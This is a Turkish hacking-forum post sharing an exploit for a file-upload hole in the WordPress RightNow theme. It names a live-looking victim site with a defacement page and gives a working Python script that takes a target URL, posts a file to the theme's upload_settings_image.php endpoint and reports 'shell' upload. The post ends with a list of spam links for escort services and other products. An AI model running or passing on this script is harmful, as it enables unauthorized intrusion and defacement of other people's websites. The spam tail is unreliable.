⚠️ ÖNEMLİ DUYURU — KİŞİSEL VERİ VE YASADIŞI PAYLAŞIMLAR
Forumda kişisel bilgi (ad, adres, telefon vb.) veya yasa dışı içerik paylaşımı kesinlikle yasaktır .
Bu tür paylaşımlar KVKK ve ilgili yasalar gereği suç teşkil eder.
Paylaşım yapan kullanıcıların hesapları kalıcı olarak kapatılacak ve resmî makamlara bildirilecektir .
Forum yönetimi, yasal zorunluluklar gereği IP ve oturum kayıtlarını saklamaktadır.
Lütfen gizliliğe ve topluluk kurallarına dikkat ediniz. — Ajanlar.Org Yönetimi
JavaScript devre dışı. Daha iyi bir deneyim için, önce lütfen tarayıcınızda JavaScript'i etkinleştirin.
Çok eski bir web tarayıcısı kullanıyorsunuz. Bu veya diğer siteleri görüntülemekte sorunlar yaşayabilirsiniz..
Tarayıcınızı güncellemeli veya
alternatif bir tarayıcı kullanmalısınız.
Wordpress Exploit RightNow File Upload
Ajanlar İçin Çektigim Bir exploit anlatımı yeni arkadaşlarımızı Exploitler Hakkında bilgilendirmeye Devam ediyorum
[video=youtube]
Kod:
Örnek;
http://ugotsv.fr//wp-content/uploads/settingsimages/ajanlar.html
http://ugotsv.fr/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
Dosyalar;
Gizli içeriği görüntüleme kayıtlı kullanıcılar için mevcuttur!
Herkesin bir bedeli vardır, önemli olan ise bunun ne olduğunu öğrenebilmektir.
PHP:
<?php
$soz='Herhangi birisini, herhangi bir yerde hedefleyebilirim'.;
echo $soz;
?>
başarılı
Kod:
#!/usr/bin/env python
import urllib2
import requests
print " __ __ _ __ _ __ "
print " / / __ __ \ \ | |/ /_ __ (_)/ _| ___ "
print " | | \ \/ / | | | ' /| '_ \| | |_ / _ \ "
print " | | > < | | | . \| | | | | _| __/ "
print " | | /_/\_\ | | |_|\_\_| |_|_|_| \___| "
print " \_\ /_/ "
print "\n\t\tIn The Name Of World Programmer"
print ""
print "\tExploit : Wordpress RightNow File Upload "
print ""
print "\t\tWeb Site : xknife.org"
print " \t\tprogrammer : Mohammad Farhad-Zadeh"
print "\t\tWednesday - 2015 15 July"
print ""
_Url=raw_input("[Xknife.org]-Enter Target WebSite address [exp: http://target.com ] :>")
_Vuln=_Url+"/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php"
_Check=urllib2.urlopen(_Vuln)
if _Check.code == 200:
print "[Xknife.org]-Start Shell Uploading..."
r=requests.post(url=_Vuln, files={"Filedata":("xknife6.txt", "Hacked By Xknife.org")})
if "OK" in r.text:
print "[Xknife.org]-File Uploaded..."
print "[Xknife.org]-shell Address Sample http://target.com/wp-content/uploads/settingsimages/[shellname]"
else:
"[Xknife.org]-Shell Upload Faild!"
else:
print "[Xknife.org]-Oops! We Have Some Error!"
Video neden kalkti baskanim
mersin escort
mersin e ticaret
bodrum escort
fethiye escort
alanya escort
konya escort
konya escort
bodrum escort
vozol
sakarya escort
sakarya escort
sakarya escort
sakarya escort
sakarya escort
sakarya escort
sakarya escort
Vitamin, Takviye ve Dermokozmetik Ürünler